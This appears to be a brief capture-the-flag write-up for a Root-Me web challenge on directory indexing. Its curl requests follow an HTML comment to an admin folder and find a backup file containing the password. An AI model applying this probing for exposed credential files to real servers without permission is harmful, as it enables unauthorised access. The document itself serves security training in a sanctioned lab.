HTTP - Directory indexing

curl http://challenge01.root-me.org/web-serveur/ch4/
<html>
<body><link rel='stylesheet' property='stylesheet' id='s' type='text/css' href='/template/s.css' media='all' /><iframe id='iframe' src='https://www.root-me.org/?page=externe_header'></iframe>
<!-- include("admin/pass.html") -->

</body>
</html>
curl http://challenge01.root-me.org/web-serveur/ch4/admin/pass.html
-> nothing just a rickroll.
curl http://challenge01.root-me.org/web-serveur/ch4/admin/backup/admin.txt
-> contains pass.
solved